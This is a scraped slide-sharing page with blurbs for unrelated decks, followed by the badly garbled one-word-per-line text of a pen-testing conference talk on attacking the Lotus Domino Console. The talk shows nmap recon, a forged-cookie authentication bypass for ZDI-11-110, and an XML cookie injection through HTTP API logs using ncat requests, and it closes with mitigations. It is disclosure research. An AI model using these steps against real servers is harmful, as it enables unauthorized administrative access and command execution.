-An update on the latest advancements in Power Grid -Model technology during the first and second quarters of 2024.
-An interactive brainstorming session to discuss and propose new feature requests.
-An opportunity to connect with fellow Power Grid Model enthusiasts and users.
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...Jason Yip
The typical problem in product engineering is not bad strategy, so much as “no strategy”. This leads to confusion, lack of motivation, and incoherent action. The next time you look for a strategy and find an empty space, instead of waiting for it to be filled, I will show you how to fill it in yourself. If you’re wrong, it forces a correction. If you’re right, it helps create focus. I’ll share how I’ve approached this in the past, both what works and lessons for what didn’t work so well.
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
Dandelion Hashtable: beyond billion requests per second on a commodity serverAntonios Katsarakis
This slide deck presents DLHT, a concurrent in-memory hashtable. Despite efforts to optimize hashtables, that go as far as sacrificing core functionality, state-of-the-art designs still incur multiple memory accesses per request and block request processing in three cases. First, most hashtables block while waiting for data to be retrieved from memory. Second, open-addressing designs, which represent the current state-of-the-art, either cannot free index slots on deletes or must block all requests to do so. Third, index resizes block every request until all objects are copied to the new index. Defying folklore wisdom, DLHT forgoes open-addressing and adopts a fully-featured and memory-aware closed-addressing design based on bounded cache-line-chaining. This design offers lock-free index operations and deletes that free slots instantly, (2) completes most requests with a single memory access, (3) utilizes software prefetching to hide memory latencies, and (4) employs a novel non-blocking and parallel resizing. In a commodity server and a memory-resident workload, DLHT surpasses 1.6B requests per second and provides 3.5x (12x) the throughput of the state-of-the-art closed-addressing (open-addressing) resizable hashtable on Gets (Deletes).
Dandelion Hashtable: beyond billion requests per second on a commodity server
Lotus Domino: Penetration Through the Controller
1. Invest
in
security
to
secure
investments
Lotus
Domino:
Penetra0on
Through
the
Controller
Alexey
Sintsov
2. #whoami
• Pen-‐tester
at
ERPscan
Company
Job
,
money
and
fun
• Researcher
Fun
• Writer
at
][akep
magazine
Self-‐
importance
• DCG#7812
POC
and
fun
Community
and
fun
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
2
3. ERPScan
• Innova've
company
engaged
in
ERP
security
R&D
• Part
of
“Digital
Security”,
a
Russian
group
of
companies
founded
in
2002
• Flagship
product
–
ERPScan
Security
Scanner
for
SAP
• Tools:
pen-‐tes'ng
tool,
sapsploit,
web.xml
scanner
• Consul'ng
Services:
ERP/SRM/CRM/SCADA/e.t.c
Pen-‐tests,
SAP
assessment,
SAP
code
review
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
3
4. What
do
pen-‐testers
do?
• Scanning
• Fingerprin'ng
• Banner
grabbing
• Play
with
passwords
• Find
vulns.
• Exploit
vulns.
• Escalate
privs.
• Dig
in
• Find
ways
to
make
aQacks
• And
e.t.c.
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
4
5. Find
vulns.
• Sta'c
– Source
code
review
• regexp
• formal
methods
• hand
tes'ng
– Reverse
Engineering
• formal
methods
• hands…
• Dynamic
– Fuzzing
(bin/web)
+
Typical
bugs
for
class
+
Reverse
Engineering
– Hand
tes'ng
• Architecture
Analysis
(Logic
flaws)
• Use
vuln.
Database
(CVE/exploit-‐db/etc)
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
5
6. Pen-‐tester
env.
Tasks:
• pwn
target
8)
• show
most
dang.
vulns.
è
show
real
aQacks
and
what
an
aQacker
can
do
Time:
Not
much
)
Targets:
Large
number
of
targets,
different
types
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
6
7. Find
vulns.
• Sta'c
– Source
code
review
• regexp
• formal
methods
• BlackBox
• hand
tes'ng
– Reverse
Engineering
• formal
methods
• Not
much
'me
• hands…
• Dynamic
– Fuzzing
(bin/web)
+
Typical
bugs
for
class
+
Reverse
Engineering
– Hand
tes'ng
• Architecture
Analysis
(Logic
flaws)
• Use
vuln.
Database
(CVE/exploit-‐db/etc)
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
7
8. Bug
hun0ng?
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
8
9. Pen-‐tester/Sec.
researcher
– New
aQacks
and
methods
Provider
– 0-‐day
bug
hun'ng
– Something
new…
–
Exploit
development
–
Exploita'on
Consumer
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
9
10. Exploit’s
life
Finding
bug
Crea'ng
PoC
Crea'ng
exploit
Selling
Exploi'ng
Crea'ng
report
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
10
11. In
real
Exploi'ng?
No!
Crea'ng
report
Finding
bug
Crea'ng
PoC
Crea'ng
exploit
Selling
Exploi'ng?
Yep!
Crash…
Crea'ng
report?
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
11
12. Target…
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
12
13. Let’s
see
some
real
stuff
First
pen-‐test
-‐
Lotus
Domino
8.5.2FP2
Second
pen-‐test
-‐
Lotus
Domino
8.5.3
(the
latest)
Pen-‐tester’s
ac'ons
How
to:
Nmap
–sV
-‐PN
-‐T5
-‐p
…
0
192.168.0.13
.
.
.
• Scan
and
grab
banners
Nmap
scan
report
for
targethost
(192.168.0.13)
• Detect
version
PORT
STATE
SERVICE
VERSION
110/tcp
open
pop3
Lotus
Domino
POP3
server
8.5.2
1352/tcp
open
lotusnotes
Lotus
Domino
server
(CN=SERV;Org=Company)
1533/tcp
open
hNp
Lotus
Domino
hNpd
2050/tcp
open
ssl/dominoconsole
Lotus
Domino
Console
(domain:
domain;
d
escrip?on:
“COMPANY")
49152/tcp
open
hNp
MicrosoS
HTTP
API
2.0
MAC
Address:
00:1A:1B:8A:1F:1E
(HewleN
Packard)
Service
Info:
OS:
Windows/Longhorn/64
6.1
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
13
14. Lotus
Domino
8.5.2FP2
Useless
• CVE-‐2011-‐0914
• CVE-‐2011-‐0915
Useless,
Pen-‐tester’s
ac'ons
• CVE-‐2011-‐0916
(client-‐
side)
• CVE-‐2011-‐0917
Useless,
• Search
for
an
exploit
• CVE-‐2011-‐0919
Fixed
in
8.5.2…
• CVE-‐2011-‐0920
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
14
15. Lotus
Domino
8.5.2FP2
• Private
• CVE-‐2011-‐0914
• DoS
risk
• CVE-‐2011-‐0915
• Private
Pen-‐tester’s
ac'ons
• CVE-‐2011-‐0916
• DoS
risk
• CVE-‐2011-‐0917
• None
• …
more
search
• CVE-‐2011-‐0919
• DoS
risk
• CVE-‐2011-‐0920
• PoC
• DoS
risk
Lotus…
blah-‐blah-‐blah,
Auth.
issue
(CWE-‐287)
• None
has
many
vuln.
issues.
• DoS
risk
Not
public
or
stable,
exploit
are
available
…
Buffer
Errors
(CWE-‐119)
blah-‐blah-‐blah,
please
• Private
update
to
8.5.2FP3
or
8.5.3
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
15
16. No
fun…
• No
fun…
• Lotus
server
s'll
not
pwned
(just
in
theory)
• If
we
could
pwn
it,
then
maybe
we
would
get
MORE
-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
BUT
-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
• We
have
no
'me
for
research
and
exploit
dev.
for
those
bugs
(CWE-‐119)
• It
is
risky
• It
is
pen-‐test
and
we
have
other
targets…
-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
SO
-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
Pen-‐tester
is
not
a
researcher?
Forget
about
it?
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
16
17. What
do
pen-‐testers
do?
• Scanning
• Fingerprin'ng
• Banner
grabbing
• Play
with
passwords
We
can’t
do
that
right
now
• Find
vulns.
Analysis:
'me
for
research
and
exploit
dev.,
resources,
• Exploit
vulns.
risks,
necessity
• Escalate
privs.
Research
• Dig
in
Exploit
dev.
• Find
ways
to
make
aQacks
• And
e.t.c.
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
17
18. Lotus
Domino
8.5.2FP2
• Time…
• CVE-‐2011-‐0914
• DoS
risk
• CVE-‐2011-‐0915
• Time
Pen-‐tester’s
ac'ons
• CVE-‐2011-‐0916
• DoS
risk
• CVE-‐2011-‐0917
• Let’s
do
some
• Time
• Fast
analyses…
research…
• CVE-‐2011-‐0919
• DoS
risk
• CVE-‐2011-‐0920
• Time
• DoS
risk
• Time
• DoS
risk
• ???
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
18
19. ZDI-‐11-‐110
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
19
20. What
is
the
protocol?
• Googling
failed
• But…
Patrik’s
NSE
scripts
can
help:
socket:reconnect_ssl()
…
socket:send("#APIn")
socket:send(
("#UI
%s,%sn"):format(user,pass)
)
socket:receive_lines(1)
socket:send("#EXITn")
…
è
SSL
#UI
login,passn
-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
• But
what
about
COOKIE?
Service
code
is
in
dconsole.jar,
so
we
can
decompile
it
and
get
protocol
descrip'ons…
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
20
26. Exploit
for
ZDI-‐11-‐110
– echo
^
<user
name=“admin"
cookie=“dsecrg"
address=“10.10.0.1"^>
>
n:
domino2zdi0day_.txt
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
26
27. Mi0ga0ons…
•
Privileges
for
system
console
– If
‘admin’
has
enough
privileges,
he
can
call
OS
commands
as
‘$whoami’
•
Service
password
for
dangerous
func'ons
–
If
service
password
is
not
set,
then
‘admin’
can
call
dangerous
func'ons
such
as
‘LOAD
cmd.exe
/c
net
use
…’
One
doesn't
exclude
another!
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
27
28. Pen-‐tester
vs.
mi0ga0ons…
• If
there
is
a
Microso~
AD
network
• If
Kerberos
is
not
used
• If
Lotus
Domino
runs
as
“win_domain/$LotusAcc”
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
28
29. Lotus
Domino
8.5.3/8.5.2FP3
Fix
№1
evilhostexploitcookie.xml
-‐-‐>
.evilhostexploitcookie.xml
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
29
30. Lotus
Domino
8.5.3/8.5.2FP3
Fix
№2
We
need
client’s
cert.
for
auth…
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
30
31. Let’s
see
some
real
stuff
First
pen-‐test
-‐
Lotus
Domino
8.5.2FP2
Second
pen-‐test
-‐
Lotus
Domino
8.5.3
(the
latest)
Pen-‐tester’s
ac'ons
How
to:
Nmap
–sV
-‐PN
-‐T5
-‐p
…
0
192.168.0.13
• Scan
and
grab
banners
.
.
.
• OR…
ersion
• Green
line
in
report?
• Detect
v
Nmap
scan
report
for
targethost
(192.168.0.13)
PORT
STATE
SERVICE
VERSION
110/tcp
open
pop3
Lotus
Domino
POP3
server
8.5.3
1352/tcp
open
lotusnotes
Lotus
Domino
server
(CN=SERV;Org=Company)
1533/tcp
open
hNp
Lotus
Domino
hNpd
2050/tcp
open
ssl/unknown
49152/tcp
open
hNp
MicrosoS
HTTP
API
2.0
MAC
Address:
00:1A:1B:8A:1F:1E
(HewleN
Packard)
Service
Info:
OS:
Windows/Longhorn/64
6.1
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
31
33. XML?
cookie.xml:
<?xml
version="1.0"
encoding="UTF-‐8"?>
<user
name=“admin"
cookie=“dsecrg"
address=“10.10.0.1">
Valid
cookie2.xml.trash:
There
is
a
good
<user
xml
file!
andname=“admin”willbefound
as
cookie=“dsecrg”
andaddress=“10.10.0.1”hooray!
>and
blah-‐blah-‐blah
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
33
34. XML?
cookie.xml:
<?xml
version="1.0"
encoding="UTF-‐8"?>
<user
name=“admin"
cookie=“dsecrg"
address=“10.10.0.1">
Valid
cookie2.xml.trash:
There
is
a
good
<user
xml
file!
andname=“admin”willbefound
as
cookie=“dsecrg”
andaddress=“10.10.0.1”hooray!
>and
blah-‐blah-‐blah
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
34
35. XML?
cookie.xml:
<?xml
version="1.0"
encoding="UTF-‐8"?>
<user
name=“admin"
cookie=“dsecrg"
address=“10.10.0.1">
Valid
cookie2.xml.trash:
There
is
a
good
<user
xml
file!
andname=“admin”willbefound
Valid
as
cookie=“dsecrg”
andaddress=“10.10.0.1”hooray!
>and
blah-‐blah-‐blah
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
35
36. XML
cookie
Injec0on
Nmap
–sV
-‐PN
-‐T5
-‐p
…
0
192.168.0.13
.
.
.
Nmap
scan
report
for
targethost
(192.168.0.13)
PORT
STATE
SERVICE
VERSION
110/tcp
open
pop3
Lotus
Domino
POP3
server
8.5.3
1352/tcp
open
lotusnotes
Lotus
Domino
server
(CN=SERV;Org=Company)
1533/tcp
open
hNp
Lotus
Domino
hNpd
2050/tcp
open
ssl/unknown
49152/tcp
open
hPp
MicrosoQ
HTTP
API
2.0
MAC
Address:
00:1A:1B:8A:1F:1E
(HewleN
Packard)
Service
Info:
OS:
Windows/Longhorn/64
6.1
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
36
37. XML
cookie
Injec0on
ncat
targethost
49152
GET
/<user
name="admin"cookie="pass"address="111">
HTTP/1.0rnrn
c:windowssystem32logfileshzperrhzperr1.log:
#Software:
Microsoft
HTTP
API
2.0
#Version:
1.0
#Date:
2011-‐08-‐22
09:19:16
#Fields:
date
time
c-‐ip
c-‐port
s-‐ip
s-‐port
cs-‐version
cs-‐method
cs-‐uri
sc-‐status
s-‐siteid
s-‐reason
s-‐queuename
2011-‐08-‐22
09:19:16
10.10.10.101
46130
10.10.9.9
47001
-‐
-‐
-‐
400
-‐
BadRequest
-‐
2011-‐08-‐22
09:19:16
10.10.10.101
46234
10.10.9.9
47001
HTTP/1.0
GET
/<user%20name="admin"cookie="pass"address="111">
404
-‐
NotFound
-‐
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
37
38. XML
cookie
Injec0on
ncat
targethost
49152
GET
/<user
HTTP/1.0
ncat
targethost
49152
GET
/name="admin"cookie="pass"address="111"
HTTP/1.0
c:windowssystem32logfileshzperrhzperr1.log:
#Software:
Microsoft
HTTP
API
2.0
#Version:
1.0
#Date:
2011-‐08-‐22
09:19:16
#Fields:
date
time
c-‐ip
c-‐port
s-‐ip
s-‐port
cs-‐version
cs-‐method
cs-‐uri
sc-‐status
s-‐siteid
s-‐reason
s-‐queuename
2011-‐08-‐22
09:19:16
10.10.10.101
46130
10.10.9.9
47001
-‐
-‐
-‐
400
-‐
BadRequest
-‐
2011-‐08-‐22
09:19:16
10.10.10.101
46234
10.10.9.9
47001
HTTP/1.0
GET
/<user
404
-‐
NotFound
-‐
2011-‐08-‐22
09:19:16
10.10.10.101
46234
10.10.9.9
GET
/name="admin"cookie="pass“
address="111">
404
-‐
NotFound
-‐
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
38
39. What
about
client’s
cert?
dconsole.jar
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
39
43. Conclusions
• Pen-‐tester
will
get
more
profit
if
he
tries
to
research
something
//
thx
Cap!
• Good
pen-‐tester
∩
good
security
researcher
• We
got
0-‐day
8)
To
admins:
• Set
filter
on
2050/tcp
• Use
both
mi'ga'ons
– Less
privileges
for
console
user
– Set
service
password
on
console
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
43
44. Thank
you!
a.sintsov@erpscan.com
@asintsov
erpscan.com
ERPScan
—
invest
in
security
to
secure
investments
44